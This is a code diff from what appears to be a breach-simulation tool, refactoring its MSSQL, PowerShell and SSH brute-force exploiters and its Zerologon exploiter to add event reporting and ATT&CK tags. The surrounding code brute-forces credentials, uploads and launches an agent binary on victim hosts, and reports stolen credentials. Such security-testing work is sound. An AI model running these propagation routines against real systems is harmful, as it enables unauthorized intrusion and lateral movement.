@ -72,15 +89,17 @@ class MSSQLExploiter(HostExploiter):
            )

            logger.error(error_message)
+            self._publish_propagation_event(timestamp, False, error_message=error_message)
            self.exploit_result.error_message = error_message

            return self.exploit_result

+        self._publish_propagation_event(timestamp, True)
        self.exploit_result.propagation_success = True
        return self.exploit_result

    def _brute_force(
-        self, host: str, port: str, users_passwords_pairs_list: Sequence[Tuple[str, str]]
+        self, host: str, port: str, users_passwords_pairs_list: Iterable[Tuple[str, str]]
    ) -> pymssql.Cursor:
        """
        Starts the brute force connection attempts and if needed then init the payload process.
@ -106,6 +125,7 @@ class MSSQLExploiter(HostExploiter):
        )

        for user, password in credentials_iterator:
+            timestamp = time()
            try:
                # Core steps
                # Trying to connect
@ -122,14 +142,14 @@ class MSSQLExploiter(HostExploiter):
                )
                self.exploit_result.exploitation_success = True
                self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT)
-                self.report_login_attempt(True, user, password)
+                self._report_login_attempt(timestamp, True, user, password)
                cursor = conn.cursor()
+
                return cursor
            except pymssql.OperationalError as err:
-                logger.info(f"Connection to MSSQL failed: {err}")
-                self.report_login_attempt(False, user, password)
-                # Combo didn't work, hopping to the next one
-                pass
+                error_message = f"Connection to MSSQL failed: {err}"
+                logger.info(error_message)
+                self._report_login_attempt(timestamp, False, user, password, error_message)

        logger.warning(
            "No user/password combo was able to connect to host: {0}:{1}, "
@ -139,14 +159,23 @@ class MSSQLExploiter(HostExploiter):
            "Bruteforce process failed on host: {0}".format(self.host.ip_addr)
        )

+    def _report_login_attempt(
+        self, timestamp: float, success: bool, user, password: str, message: str = ""
+    ):
+        self._publish_exploitation_event(timestamp, success, error_message=message)
+        self.report_login_attempt(success, user, password)
+
    def _upload_agent(self, agent_path_on_victim: PureWindowsPath):
        http_thread = self._start_agent_server(agent_path_on_victim)

        self._run_agent_download_command(agent_path_on_victim)

-        MSSQLExploiter._stop_agent_server(http_thread)
+        if http_thread:
+            MSSQLExploiter._stop_agent_server(http_thread)

-    def _start_agent_server(self, agent_path_on_victim: PureWindowsPath) -> LockedHTTPServer:
+    def _start_agent_server(
+        self, agent_path_on_victim: PureWindowsPath
+    ) -> Optional[LockedHTTPServer]:
        self.agent_http_path, http_thread = HTTPTools.create_locked_transfer(
            self.host, str(agent_path_on_victim), self.agent_binary_repository
        )
@ -179,7 +208,7 @@ class MSSQLExploiter(HostExploiter):

    def _build_agent_launch_command(self, agent_path_on_victim: PureWindowsPath) -> str:
        agent_args = build_monkey_commandline(
-            self.servers, self.current_depth + 1, agent_path_on_victim
+            self.servers, self.current_depth + 1, str(agent_path_on_victim)
        )

        return f"{agent_path_on_victim} {DROPPER_ARG} {agent_args}"
--- a/monkey/infection_monkey/exploit/powershell.py
+++ b/monkey/infection_monkey/exploit/powershell.py
@ -1,8 +1,14 @@
 import logging
 from pathlib import Path, PurePath
+from time import time
 from typing import List, Optional

 from common import OperatingSystem
+from common.tags import (
+    T1059_ATTACK_TECHNIQUE_TAG,
+    T1105_ATTACK_TECHNIQUE_TAG,
+    T1110_ATTACK_TECHNIQUE_TAG,
+)
 from infection_monkey.exploit.HostExploiter import HostExploiter
 from infection_monkey.exploit.powershell_utils.auth_options import AuthOptions, get_auth_options
 from infection_monkey.exploit.powershell_utils.credentials import (
@ -21,6 +27,7 @@ from infection_monkey.utils.environment import is_windows_os
 from infection_monkey.utils.threading import interruptible_iter

 logger = logging.getLogger(__name__)
+POWERSHELL_EXPLOITER_TAG = "powershell-exploiter"


 class RemoteAgentCopyError(Exception):
@ -34,6 +41,17 @@ class RemoteAgentExecutionError(Exception):
 class PowerShellExploiter(HostExploiter):
    _EXPLOITED_SERVICE = "PowerShell Remoting (WinRM)"

+    _EXPLOITER_TAGS = (
+        POWERSHELL_EXPLOITER_TAG,
+        T1059_ATTACK_TECHNIQUE_TAG,
+        T1110_ATTACK_TECHNIQUE_TAG,
+    )
+    _PROPAGATION_TAGS = (
+        POWERSHELL_EXPLOITER_TAG,
+        T1059_ATTACK_TECHNIQUE_TAG,
+        T1105_ATTACK_TECHNIQUE_TAG,
+    )
+
    def __init__(self):
        super().__init__()
        self._client = None
@ -68,12 +86,21 @@ class PowerShellExploiter(HostExploiter):
            )
            return self.exploit_result

+        execute_agent_timestamp = time()
        try:
            self._execute_monkey_agent_on_victim()
-            self.exploit_result.propagation_success = True
-        except Exception as ex:
-            logger.error(f"Failed to propagate to the remote host: {ex}")
-            self.exploit_result.error_message = str(ex)
+        except Exception as err:
+            self.exploit_result.error_message = f"Failed to propagate to the remote host: {err}"
+            self._publish_propagation_event(
+                time=execute_agent_timestamp,
+                success=False,
+                error_message=self.exploit_result.error_message,
+            )
+            logger.error(self.exploit_result.error_message)
+            return self.exploit_result
+
+        self.exploit_result.propagation_success = True
+        self._publish_propagation_event(time=execute_agent_timestamp, success=True)

        return self.exploit_result

@ -94,21 +121,27 @@ class PowerShellExploiter(HostExploiter):

            try:
                client = PowerShellClient(self.host.ip_addr, creds, opts)
+                connect_timestamp = time()
                client.connect()
                logger.info(
                    f"Successfully logged into {self.host.ip_addr} using Powershell. User: "
                    f"{creds.username}, Secret Type: {creds.secret_type.name}"
                )

+                self._publish_exploitation_event(time=connect_timestamp, success=True)
                self.exploit_result.exploitation_success = True
                self._report_login_attempt(True, creds)

                return client
            except Exception as ex:
-                logger.debug(
+                error_message = (
                    f"Error logging into {self.host.ip_addr} using Powershell. User: "
                    f"{creds.username}, SecretType: {creds.secret_type.name} -- Error: {ex}"
                )
+                logger.debug(error_message)
+                self._publish_exploitation_event(
+                    time=connect_timestamp, success=False, error_message=error_message
+                )
                self._report_login_attempt(False, creds)

        return None
--- a/monkey/infection_monkey/exploit/powershell_utils/powershell_client.py
+++ b/monkey/infection_monkey/exploit/powershell_utils/powershell_client.py
@ -43,7 +43,7 @@ def format_password(credentials: Credentials) -> Optional[str]:
    if credentials.secret_type == SecretType.CACHED:
        return None

-    plaintext_secret = get_plaintext(credentials.secret)
+    plaintext_secret = str(get_plaintext(credentials.secret))

    if credentials.secret_type == SecretType.PASSWORD:
        return plaintext_secret
--- a/monkey/infection_monkey/exploit/sshexec.py
+++ b/monkey/infection_monkey/exploit/sshexec.py
@ -1,15 +1,27 @@
 import io
 import logging
+from ipaddress import IPv4Address
 from pathlib import PurePath
+from time import time
+from typing import Optional

 import paramiko

 from common import OperatingSystem
+from common.agent_events import TCPScanEvent
 from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
 from common.credentials import get_plaintext
+from common.tags import (
+    T1021_ATTACK_TECHNIQUE_TAG,
+    T1105_ATTACK_TECHNIQUE_TAG,
+    T1110_ATTACK_TECHNIQUE_TAG,
+    T1222_ATTACK_TECHNIQUE_TAG,
+)
+from common.types import PortStatus
 from common.utils import Timer
 from common.utils.attack_utils import ScanStatus
 from common.utils.exceptions import FailedExploitationError
+from infection_monkey.exploit import RetrievalError
 from infection_monkey.exploit.HostExploiter import HostExploiter
 from infection_monkey.exploit.tools.helpers import get_agent_dst_path
 from infection_monkey.i_puppet import ExploiterResultData
@ -19,6 +31,7 @@ from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
 from infection_monkey.telemetry.attack.t1222_telem import T1222Telem
 from infection_monkey.utils.brute_force import generate_identity_secret_pairs
 from infection_monkey.utils.commands import build_monkey_commandline
+from infection_monkey.utils.ids import get_agent_id
 from infection_monkey.utils.threading import interruptible_iter

 logger = logging.getLogger(__name__)
@ -30,11 +43,15 @@ SSH_EXEC_TIMEOUT = LONG_REQUEST_TIMEOUT
 SSH_CHANNEL_TIMEOUT = MEDIUM_REQUEST_TIMEOUT

 TRANSFER_UPDATE_RATE = 15
+SSH_EXPLOITER_TAG = "ssh-exploiter"


 class SSHExploiter(HostExploiter):
    _EXPLOITED_SERVICE = "SSH"

+    _EXPLOITER_TAGS = (SSH_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1021_ATTACK_TECHNIQUE_TAG)
+    _PROPAGATION_TAGS = (SSH_EXPLOITER_TAG, T1105_ATTACK_TECHNIQUE_TAG, T1222_ATTACK_TECHNIQUE_TAG)
+
    def __init__(self):
        super(SSHExploiter, self).__init__()

@ -46,7 +63,7 @@ class SSHExploiter(HostExploiter):
            logger.debug("SFTP transferred: %d bytes, total: %d bytes", transferred, total)
            timer.reset()

-    def exploit_with_ssh_keys(self, port) -> paramiko.SSHClient:
+    def exploit_with_ssh_keys(self, port: int) -> paramiko.SSHClient:
        user_ssh_key_pairs = generate_identity_secret_pairs(
            identities=self.options["credentials"]["exploit_user_list"],
            secrets=self.options["credentials"]["exploit_ssh_keys"],
@ -70,6 +87,8 @@ class SSHExploiter(HostExploiter):
                pkey = paramiko.RSAKey.from_private_key(pkey)
            except (IOError, paramiko.SSHException, paramiko.PasswordRequiredException):
                logger.error("Failed reading ssh key")
+
+            timestamp = time()
            try:
                ssh.connect(
                    self.host.ip_addr,
@ -86,20 +105,30 @@ class SSHExploiter(HostExploiter):
                )
                self.add_vuln_port(port)
                self.exploit_result.exploitation_success = True
+                self._publish_exploitation_event(timestamp, True)
                self.report_login_attempt(True, user, ssh_key=ssh_string)
                return ssh
            except paramiko.AuthenticationException as err:
                ssh.close()
-                logger.info(
-                    f"Failed logging into victim {self.host} with {ssh_string} private key: {err}",
+                error_message = (
+                    f"Failed logging into victim {self.host} with {ssh_string} private key: {err}"
                )
+                logger.info(error_message)
+                self._publish_exploitation_event(timestamp, False, error_message=error_message)
                self.report_login_attempt(False, user, ssh_key=ssh_string)
                continue
            except Exception as err:
-                logger.error(f"Unknown error while attempting to login with ssh key: {err}")
+                error_message = (
+                    f"Unexpected error while attempting to login to {ssh_string} with ssh key: "
+                    f"{err}"
+                )
+                logger.error(error_message)
+                self._publish_exploitation_event(timestamp, False, error_message=error_message)
+                self.report_login_attempt(False, user, ssh_key=ssh_string)
+
        raise FailedExploitationError

-    def exploit_with_login_creds(self, port) -> paramiko.SSHClient:
+    def exploit_with_login_creds(self, port: int) -> paramiko.SSHClient:
        user_password_pairs = generate_identity_secret_pairs(
            identities=self.options["credentials"]["exploit_user_list"],
            secrets=self.options["credentials"]["exploit_password_list"],
@ -116,6 +145,8 @@ class SSHExploiter(HostExploiter):

            ssh = paramiko.SSHClient()
            ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
+
+            timestamp = time()
            try:
                ssh.connect(
                    self.host.ip_addr,
@ -131,108 +162,79 @@ class SSHExploiter(HostExploiter):
                logger.debug("Successfully logged in %r using SSH. User: %s", self.host, user)
                self.add_vuln_port(port)
                self.exploit_result.exploitation_success = True
+                self._publish_exploitation_event(timestamp, True)
                self.report_login_attempt(True, user, current_password)
                return ssh

            except paramiko.AuthenticationException as err:
-                logger.debug(
-                    "Failed logging into victim %r with user" " %s: (%s)",
-                    self.host,
-                    user,
-                    err,
-                )
+                error_message = f"Failed logging into victim {self.host} with user: {user}: {err}"
+                logger.debug(error_message)
+                self._publish_exploitation_event(timestamp, False, error_message=error_message)
                self.report_login_attempt(False, user, current_password)
                ssh.close()
                continue
            except Exception as err:
-                logger.error(f"Unknown error occurred while trying to login to ssh: {err}")
+                error_message = (
+                    f"Unexpected error while attempting to login to {self.host} with password: "
+                    f"{err}"
+                )
+                logger.error(error_message)
+                self._publish_exploitation_event(timestamp, False, error_message=error_message)
+                self.report_login_attempt(False, user, current_password)
+
        raise FailedExploitationError

    def _exploit_host(self) -> ExploiterResultData:
-        port = SSH_PORT
+        port = self._get_ssh_port()

-        # if ssh banner found on different port, use that port.
-        for servkey, servdata in list(self.host.services.items()):
-            if servdata.get("name") == "ssh" and servkey.startswith("tcp-"):
-                port = int(servkey.replace("tcp-", ""))
-
-        is_open, _ = check_tcp_port(self.host.ip_addr, port)
-        if not is_open:
+        if not self._is_port_open(IPv4Address(self.host.ip_addr), port):
            self.exploit_result.error_message = f"SSH port is closed on {self.host}, skipping"
-
            logger.info(self.exploit_result.error_message)
            return self.exploit_result

+        try:
+            ssh = self._exploit(port)
+        except FailedExploitationError as err:
+            self.exploit_result.error_message = str(err)
+            logger.error(self.exploit_result.error_message)
+
+            return self.exploit_result
+
+        if self._is_interrupted():
+            self._set_interrupted()
+            return self.exploit_result
+
+        try:
+            self._propagate(ssh)
+        except (FailedExploitationError, RuntimeError) as err:
+            self.exploit_result.error_message = str(err)
+            logger.error(self.exploit_result.error_message)
+        finally:
+            ssh.close()
+            return self.exploit_result
+
+    def _exploit(self, port: int) -> paramiko.SSHClient:
        try:
            ssh = self.exploit_with_ssh_keys(port)
        except FailedExploitationError:
            try:
                ssh = self.exploit_with_login_creds(port)
            except FailedExploitationError:
-                self.exploit_result.error_message = "Exploiter SSHExploiter is giving up..."
-                logger.error(self.exploit_result.error_message)
-                return self.exploit_result
+                raise FailedExploitationError("Exploiter SSHExploiter is giving up...")
+
+        return ssh
+
+    def _propagate(self, ssh: paramiko.SSHClient):
+        agent_binary_file_object = self._get_agent_binary(ssh)
+        if agent_binary_file_object is None:
+            raise RuntimeError("Can't find suitable monkey executable for host {self.host}")

        if self._is_interrupted():
            self._set_interrupted()
-            return self.exploit_result
-
-        if not self.host.os.get("type"):
-            try:
-                _, stdout, _ = ssh.exec_command("uname -o", timeout=SSH_EXEC_TIMEOUT)
-                uname_os = stdout.read().lower().strip().decode()
-                if "linux" in uname_os:
-                    self.exploit_result.os = OperatingSystem.LINUX
-                    self.host.os["type"] = OperatingSystem.LINUX
-                else:
-                    self.exploit_result.error_message = f"SSH Skipping unknown os: {uname_os}"
-
-                    if not uname_os:
-                        logger.error(self.exploit_result.error_message)
-                    return self.exploit_result
-            except Exception as exc:
-                self.exploit_result.error_message = (
-                    f"Error running uname os command on victim {self.host}: ({exc})"
-                )
-
-                logger.error(self.exploit_result.error_message)
-                return self.exploit_result
-
-        agent_binary_file_object = self.agent_binary_repository.get_agent_binary(
-            self.exploit_result.os
-        )
-
-        if not agent_binary_file_object:
-            self.exploit_result.error_message = (
-                f"Can't find suitable monkey executable for host {self.host}"
-            )
-
-            logger.error(self.exploit_result.error_message)
-            return self.exploit_result
-
-        if self._is_interrupted():
-            self._set_interrupted()
-            return self.exploit_result
+            raise RuntimeError("Propagation was interrupted")

        monkey_path_on_victim = get_agent_dst_path(self.host)
-
-        try:
-            with ssh.open_sftp() as ftp:
-                ftp.putfo(
-                    agent_binary_file_object,
-                    str(monkey_path_on_victim),
-                    file_size=len(agent_binary_file_object.getbuffer()),
-                    callback=self.log_transfer,
-                )
-                self._set_executable_bit_on_agent_binary(ftp, monkey_path_on_victim)
-
-            status = ScanStatus.USED
-        except Exception as exc:
-            self.exploit_result.error_message = (
-                f"Error uploading file into victim {self.host}: ({exc})"
-            )
-            logger.error(self.exploit_result.error_message)
-            status = ScanStatus.SCANNED
+        status = self._upload_agent_binary(ssh, agent_binary_file_object, monkey_path_on_victim)

        self.telemetry_messenger.send_telemetry(
            T1105Telem(
@ -242,13 +244,15 @@ class SSHExploiter(HostExploiter):
                monkey_path_on_victim,
            )
        )
+
        if status == ScanStatus.SCANNED:
-            return self.exploit_result
+            raise FailedExploitationError(self.exploit_result.error_message)

        try:
            cmdline = f"{monkey_path_on_victim} {MONKEY_ARG}"
            cmdline += build_monkey_commandline(self.servers, self.current_depth + 1)
            cmdline += " > /dev/null 2>&1 &"
+            timestamp = time()
            ssh.exec_command(cmdline, timeout=SSH_EXEC_TIMEOUT)

            logger.info(
@ -259,18 +263,87 @@ class SSHExploiter(HostExploiter):
            )

            self.exploit_result.propagation_success = True
-
-            ssh.close()
+            self._publish_propagation_event(timestamp, True)
            self.add_executed_cmd(cmdline)
-            return self.exploit_result

        except Exception as exc:
-            self.exploit_result.error_message = (
-                f"Error running monkey on victim {self.host}: ({exc})"
-            )
+            error_message = f"Error running monkey on victim {self.host}: ({exc})"
+            self._publish_propagation_event(timestamp, False, error_message=error_message)
+            raise FailedExploitationError(error_message)

-            logger.error(self.exploit_result.error_message)
-            return self.exploit_result
+    def _is_port_open(self, ip: IPv4Address, port: int) -> bool:
+        is_open, _ = check_tcp_port(ip, port)
+        status = PortStatus.OPEN if is_open else PortStatus.CLOSED
+        self.agent_event_queue.publish(
+            TCPScanEvent(source=get_agent_id(), target=ip, ports={port: status})
+        )
+
+        return is_open
+
+    def _get_ssh_port(self) -> int:
+        port = SSH_PORT
+
+        # if ssh banner found on different port, use that port.
+        for servkey, servdata in list(self.host.services.items()):
+            if servdata.get("name") == "ssh" and servkey.startswith("tcp-"):
+                port = int(servkey.replace("tcp-", ""))
+
+        return port
+
+    def _get_victim_os(self, ssh: paramiko.SSHClient) -> bool:
+        try:
+            _, stdout, _ = ssh.exec_command("uname -o", timeout=SSH_EXEC_TIMEOUT)
+            uname_os = stdout.read().lower().strip().decode()
+            if "linux" in uname_os:
+                self.exploit_result.os = OperatingSystem.LINUX
+                self.host.os["type"] = OperatingSystem.LINUX
+            else:
+                self.exploit_result.error_message = f"SSH Skipping unknown os: {uname_os}"
+
+                if not uname_os:
+                    logger.error(self.exploit_result.error_message)
+                return False
+        except Exception as exc:
+            logger.error(f"Error running uname os command on victim {self.host}: ({exc})")
+            return False
+        return True
+
+    def _get_agent_binary(self, ssh: paramiko.SSHClient) -> Optional[io.BytesIO]:
+        if not self.host.os.get("type") and not self._get_victim_os(ssh):
+            return None
+
+        try:
+            agent_binary_file_object = self.agent_binary_repository.get_agent_binary(
+                self.exploit_result.os
+            )
+        except RetrievalError:
+            return None
+
+        return agent_binary_file_object
+
+    def _upload_agent_binary(
+        self,
+        ssh: paramiko.SSHClient,
+        agent_binary_file_object: io.BytesIO,
+        monkey_path_on_victim: PurePath,
+    ) -> ScanStatus:
+        try:
+            timestamp = time()
+            with ssh.open_sftp() as ftp:
+                ftp.putfo(
+                    agent_binary_file_object,
+                    str(monkey_path_on_victim),
+                    file_size=len(agent_binary_file_object.getbuffer()),
+                    callback=self.log_transfer,
+                )
+                self._set_executable_bit_on_agent_binary(ftp, monkey_path_on_victim)
+
+            return ScanStatus.USED
+        except Exception as exc:
+            error_message = f"Error uploading file into victim {self.host}: ({exc})"
+            self._publish_propagation_event(timestamp, False, error_message=error_message)
+            self.exploit_result.error_message = error_message
+            return ScanStatus.SCANNED

    def _set_executable_bit_on_agent_binary(
        self, ftp: paramiko.sftp_client.SFTPClient, monkey_path_on_victim: PurePath
--- a/monkey/infection_monkey/exploit/tools/http_tools.py
+++ b/monkey/infection_monkey/exploit/tools/http_tools.py
@ -3,6 +3,7 @@ import urllib.error
 import urllib.parse
 import urllib.request
 from threading import Lock
+from typing import Optional, Tuple

 from infection_monkey.network.firewall import app as firewall
 from infection_monkey.network.info import get_free_tcp_port
@ -28,7 +29,7 @@ class HTTPTools(object):
    @staticmethod
    def create_locked_transfer(
        host, dropper_target_path, agent_binary_repository, local_ip=None, local_port=None
-    ) -> LockedHTTPServer:
+    ) -> Tuple[Optional[str], Optional[LockedHTTPServer]]:
        """
        Create http server for file transfer with a lock
        :param host: Variable with target's information
--- a/monkey/infection_monkey/exploit/zerologon.py
+++ b/monkey/infection_monkey/exploit/zerologon.py
@ -18,6 +18,7 @@ from impacket.dcerpc.v5.dtypes import NULL
 from common.agent_events import CredentialsStolenEvent
 from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT
 from common.credentials import Credentials, LMHash, NTHash, Username
+from common.tags import T1003_ATTACK_TECHNIQUE_TAG, T1098_ATTACK_TECHNIQUE_TAG
 from infection_monkey.exploit.HostExploiter import HostExploiter
 from infection_monkey.exploit.tools.wmi_tools import WmiTools
 from infection_monkey.exploit.zerologon_utils.dump_secrets import DumpSecrets
@ -32,9 +33,6 @@ from infection_monkey.utils.threading import interruptible_iter
 logger = logging.getLogger(__name__)

 ZEROLOGON_EXPLOITER_TAG = "zerologon-exploiter"
-T1003_ATTACK_TECHNIQUE_TAG = "attack-t1003"
-T1098_ATTACK_TECHNIQUE_TAG = "attack-t1098"
-

 ZEROLOGON_EVENT_TAGS = frozenset(
    {
@ -315,7 +313,7 @@ class ZerologonExploiter(HostExploiter):
            tags=ZEROLOGON_EVENT_TAGS,
            stolen_credentials=extracted_credentials,
        )
-        self.event_queue.publish(credentials_stolen_event)
+        self.agent_event_queue.publish(credentials_stolen_event)

    def get_original_pwd_nthash(self, username: str, user_pwd_hashes: List[str]) -> Optional[str]:
        if not self.save_HKLM_keys_locally(username, user_pwd_hashes):
--- a/monkey/infection_monkey/master/ip_scan_results.py
+++ b/monkey/infection_monkey/master/ip_scan_results.py
@ -1,15 +1,14 @@
 from dataclasses import dataclass
 from typing import Dict

-from common.types import PingScanData
+from common.types import NetworkPort, PingScanData
 from infection_monkey.i_puppet import FingerprintData, PortScanData

-Port = int
 FingerprinterName = str


@dataclass
 class IPScanResults:
    ping_scan_data: PingScanData
-    port_scan_data: Dict[Port, PortScanData]
+    port_scan_data: Dict[NetworkPort, PortScanData]
    fingerprint_data: Dict[FingerprinterName, FingerprintData]
--- a/monkey/infection_monkey/master/propagator.py
+++ b/monkey/infection_monkey/master/propagator.py
@ -10,7 +10,7 @@ from common.agent_configuration import (
    PropagationConfiguration,
    ScanTargetConfiguration,
 )
-from common.types import PingScanData, PortStatus
+from common.types import NetworkPort, PingScanData, PortStatus
 from infection_monkey.i_puppet import ExploiterResultData, FingerprintData, PortScanData
 from infection_monkey.model import VictimHost, VictimHostFactory
 from infection_monkey.network import NetworkAddress
@ -21,7 +21,7 @@ from infection_monkey.telemetry.scan_telem import ScanTelem
 from infection_monkey.utils.threading import create_daemon_thread

 from . import Exploiter, IPScanner, IPScanResults
-from .ip_scan_results import FingerprinterName, Port
+from .ip_scan_results import FingerprinterName

 logger = logging.getLogger()

@ -146,7 +146,7 @@ class Propagator:

    @staticmethod
    def _process_tcp_scan_results(
-        victim_host: VictimHost, port_scan_data: Mapping[Port, PortScanData]
+        victim_host: VictimHost, port_scan_data: Mapping[NetworkPort, PortScanData]
    ):
        for psd in filter(
            lambda scan_data: scan_data.status == PortStatus.OPEN, port_scan_data.values()
--- a/monkey/infection_monkey/monkey.py
+++ b/monkey/infection_monkey/monkey.py
@ -13,7 +13,7 @@ from common.agent_event_serializers import (
    AgentEventSerializerRegistry,
    register_common_agent_event_serializers,
 )
-from common.agent_events import CredentialsStolenEvent
+from common.agent_events import CredentialsStolenEvent, PropagationEvent
 from common.agent_registration_data import AgentRegistrationData
 from common.event_queue import IAgentEventQueue, PyPubSubAgentEventQueue
 from common.network.network_utils import get_my_ip_addresses, get_network_interfaces
@ -21,7 +21,11 @@ from common.types import SocketAddress
 from common.utils.argparse_types import positive_int
 from common.utils.attack_utils import ScanStatus, UsageEnum
 from common.version import get_version
-from infection_monkey.agent_event_forwarder import AgentEventForwarder
+from infection_monkey.agent_event_handlers import (
+    AgentEventForwarder,
+    add_stolen_credentials_to_propagation_credentials_repository,
+    notify_relay_on_propagation,
+)
 from infection_monkey.config import GUID
 from infection_monkey.control import ControlClient
 from infection_monkey.credential_collectors import (
@ -31,7 +35,6 @@ from infection_monkey.credential_collectors import (
 from infection_monkey.credential_repository import (
    AggregatingPropagationCredentialsRepository,
    IPropagationCredentialsRepository,
-    add_credentials_from_event_to_propagation_credentials_repository,
 )
 from infection_monkey.exploit import CachingAgentBinaryRepository, ExploiterWrapper
 from infection_monkey.exploit.hadoop import HadoopExploiter
@ -80,9 +83,6 @@ from infection_monkey.puppet.puppet import Puppet
 from infection_monkey.system_singleton import SystemSingleton
 from infection_monkey.telemetry.attack.t1106_telem import T1106Telem
 from infection_monkey.telemetry.attack.t1107_telem import T1107Telem
-from infection_monkey.telemetry.messengers.exploit_intercepting_telemetry_messenger import (
-    ExploitInterceptingTelemetryMessenger,
-)
 from infection_monkey.telemetry.messengers.legacy_telemetry_messenger_adapter import (
    LegacyTelemetryMessengerAdapter,
 )
@ -278,15 +278,11 @@ class InfectionMonkey:

        victim_host_factory = self._build_victim_host_factory(local_network_interfaces)

-        telemetry_messenger = ExploitInterceptingTelemetryMessenger(
-            self._telemetry_messenger, self._relay
-        )
-
        self._master = AutomatedMaster(
            self._current_depth,
            servers,
            puppet,
-            telemetry_messenger,
+            self._telemetry_messenger,
            victim_host_factory,
            self._control_channel,
            local_network_interfaces,
@ -306,13 +302,14 @@ class InfectionMonkey:
    ):
        agent_event_queue.subscribe_type(
            CredentialsStolenEvent,
-            add_credentials_from_event_to_propagation_credentials_repository(
+            add_stolen_credentials_to_propagation_credentials_repository(
                propagation_credentials_repository
            ),
        )
        agent_event_queue.subscribe_all_events(
            AgentEventForwarder(self._island_api_client, agent_event_serializer_registry).send_event
        )
+        agent_event_queue.subscribe_type(PropagationEvent, notify_relay_on_propagation(self._relay))

    def _build_puppet(
        self,
--- a/monkey/infection_monkey/network/tools.py
+++ b/monkey/infection_monkey/network/tools.py
@ -3,6 +3,8 @@ import select
 import socket
 import struct
 import sys
+from ipaddress import IPv4Address
+from typing import Optional

 from common.common_consts.timeouts import CONNECTION_TIMEOUT
 from infection_monkey.network.info import get_routes
@ -13,7 +15,7 @@ BANNER_READ = 1024
 logger = logging.getLogger(__name__)


-def check_tcp_port(ip, port, timeout=DEFAULT_TIMEOUT, get_banner=False):
+def check_tcp_port(ip: IPv4Address, port: int, timeout=DEFAULT_TIMEOUT, get_banner=False):
    """
    Checks if a given TCP port is open
    :param ip: Target IP
@ -26,7 +28,7 @@ def check_tcp_port(ip, port, timeout=DEFAULT_TIMEOUT, get_banner=False):
    sock.settimeout(timeout)

    try:
-        sock.connect((ip, port))
+        sock.connect((str(ip), port))
    except socket.timeout:
        return False, None
    except socket.error as exc:
@ -51,7 +53,7 @@ def tcp_port_to_service(port):
    return "tcp-" + str(port)


-def get_interface_to_target(dst: str) -> str:
+def get_interface_to_target(dst: str) -> Optional[str]:
    """
    :param dst: destination IP address string without port. E.G. '192.168.1.1.'
    :return: IP address string of an interface that can connect to the target. E.G. '192.168.1.4.'
--- a/monkey/infection_monkey/telemetry/messengers/exploit_intercepting_telemetry_messenger.py
+++ b/monkey/infection_monkey/telemetry/messengers/exploit_intercepting_telemetry_messenger.py
@ -1,41 +0,0 @@
-from functools import singledispatch
-from ipaddress import IPv4Address
-
-from infection_monkey.network.relay import TCPRelay
-from infection_monkey.telemetry.exploit_telem import ExploitTelem
-from infection_monkey.telemetry.i_telem import ITelem
-from infection_monkey.telemetry.messengers.i_telemetry_messenger import ITelemetryMessenger
-
-
-class ExploitInterceptingTelemetryMessenger(ITelemetryMessenger):
-    def __init__(self, telemetry_messenger: ITelemetryMessenger, relay: TCPRelay):
-        self._telemetry_messenger = telemetry_messenger
-        self._relay = relay
-
-    def send_telemetry(self, telemetry: ITelem):
-        _send_telemetry(telemetry, self._telemetry_messenger, self._relay)
-
-
-# Note: We can use @singledispatchmethod instead of @singledispatch if we migrate to Python 3.8 or
-# later.
-@singledispatch
-def _send_telemetry(
-    telemetry: ITelem,
-    telemetry_messenger: ITelemetryMessenger,
-    relay: TCPRelay,
-):
-    telemetry_messenger.send_telemetry(telemetry)
-
-
-@_send_telemetry.register
-def _(
-    telemetry: ExploitTelem,
-    telemetry_messenger: ITelemetryMessenger,
-    relay: TCPRelay,
-):
-    if telemetry.propagation_result is True:
-        if relay:
-            address = IPv4Address(str(telemetry.host["ip_addr"]))
-            relay.add_potential_user(address)
-
-    telemetry_messenger.send_telemetry(telemetry)
--- a/monkey/infection_monkey/utils/commands.py
+++ b/monkey/infection_monkey/utils/commands.py
@ -1,4 +1,5 @@
-from typing import List, Optional
+from pathlib import PurePath
+from typing import List, Optional, Union

 from infection_monkey.config import GUID
 from infection_monkey.exploit.tools.helpers import AGENT_BINARY_PATH_LINUX, AGENT_BINARY_PATH_WIN64
@ -9,7 +10,9 @@ DROPPER_TARGET_PATH_LINUX = AGENT_BINARY_PATH_LINUX
 DROPPER_TARGET_PATH_WIN64 = AGENT_BINARY_PATH_WIN64


-def build_monkey_commandline(servers: List[str], depth: int, location: Optional[str] = None) -> str:
+def build_monkey_commandline(
+    servers: List[str], depth: int, location: Union[str, PurePath, None] = None
+) -> str:

    return " " + " ".join(
        build_monkey_commandline_explicitly(
@ -25,7 +28,7 @@ def build_monkey_commandline_explicitly(
    parent: Optional[str] = None,
    servers: Optional[List[str]] = None,
    depth: Optional[int] = None,
-    location: Optional[str] = None,
+    location: Union[str, PurePath, None] = None,
 ) -> List[str]:
    cmdline = []

--- a/monkey/monkey_island/cc/agent_event_handlers/scan_event_handler.py
+++ b/monkey/monkey_island/cc/agent_event_handlers/scan_event_handler.py
@ -5,8 +5,8 @@ from typing import Union
 from typing_extensions import TypeAlias

 from common.agent_events import PingScanEvent, TCPScanEvent
-from common.types import PortStatus
-from monkey_island.cc.models import CommunicationType, Machine
+from common.types import PortStatus, SocketAddress
+from monkey_island.cc.models import CommunicationType, Machine, Node
 from monkey_island.cc.repository import (
    IAgentRepository,
    IMachineRepository,
@ -56,8 +56,10 @@ class ScanEventHandler:

        try:
            target_machine = self._get_target_machine(event)
+            source_node = self._get_source_node(event)

            self._update_nodes(target_machine, event)
+            self._update_tcp_connections(source_node, target_machine, event)
        except (RetrievalError, StorageError, UnknownRecordError):
            logger.exception("Unable to process tcp scan data")

@ -73,6 +75,14 @@ class ScanEventHandler:
            self._machine_repository.upsert_machine(machine)
            return machine

+    def _get_source_node(self, event: ScanEvent) -> Node:
+        machine = self._get_source_machine(event)
+        return self._node_repository.get_node_by_machine_id(machine.id)
+
+    def _get_source_machine(self, event: ScanEvent) -> Machine:
+        agent = self._agent_repository.get_agent_by_id(event.source)
+        return self._machine_repository.get_machine_by_id(agent.machine_id)
+
    def _update_target_machine_os(self, machine: Machine, event: PingScanEvent):
        if event.os is not None and machine.operating_system is None:
            machine.operating_system = event.os
